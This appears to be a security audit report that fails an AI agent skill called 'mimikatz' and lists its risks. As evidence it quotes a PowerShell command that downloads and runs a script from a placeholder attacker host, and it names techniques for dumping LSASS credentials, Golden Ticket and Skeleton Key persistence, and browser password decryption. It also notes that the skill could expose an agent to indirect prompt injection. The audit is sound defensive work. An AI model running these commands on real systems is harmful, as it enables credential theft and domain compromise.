mimikatz
Fail
Audited by Gen Agent Trust Hub on Sep 15, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONPRIVILEGE_ESCALATIONPERSISTENCECREDENTIALS_UNSAFEEXTERNAL_DOWNLOADSINDIRECT_PROMPT_INJECTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill provides instructions for downloading and reflectively executing code from external, untrusted sources using PowerShell.
- Evidence:
IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER/Invoke-Mimikatz.ps1')inSKILL.mdandreferences/credential-theft-tradecraft.md. - [COMMAND_EXECUTION]: The skill utilizes several system utilities and LOLBins to perform sensitive operations such as memory dumping.
- Evidence: Use of
mimikatz.exe,procdump.exe,rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump, andvssadmininSKILL.md. - [PRIVILEGE_ESCALATION]: The skill documents methods for obtaining administrative privileges and bypassing system protections.
- Evidence: Instructions for
privilege::debug,token::elevate, and using themimidrv.sysdriver to remove protection fromlsass.exevia!processprotectinSKILL.md. - [PERSISTENCE]: The skill provides instructions for establishing long-term persistence in a domain environment through forged Kerberos tickets and Domain Controller manipulation.
- Evidence: Detailed sections on forging 'Golden Tickets' and patching Domain Controllers with a 'Skeleton Key' in
SKILL.md. - [CREDENTIALS_UNSAFE]: The skill is primarily focused on the extraction of sensitive authentication material from system memory and protected storage.
- Evidence: Instructions for dumping LSASS, SAM database, and decrypting DPAPI protected blobs for Chrome and Edge passwords in
SKILL.mdandreferences/credential-theft-tradecraft.md. - [EXTERNAL_DOWNLOADS]: The skill references the installation of external security packages from public registries.
- Evidence:
pip install pypykatzinreferences/credential-theft-tradecraft.md. - [INDIRECT_PROMPT_INJECTION]: The skill processes external data files such as browser database and credential blobs that could potentially contain malicious instructions.
- Evidence Chain:
- Ingestion points: Reading and decrypting browser login data and vault credentials in
SKILL.mdandreferences/credential-theft-tradecraft.md. - Boundary markers: None present to distinguish data from instructions.
- Capability inventory: Extensive capabilities including file manipulation, token impersonation, and remote execution.
- Sanitization: No sanitization of processed data is documented.
Recommendations
- AI detected serious security threats
Audit Metadata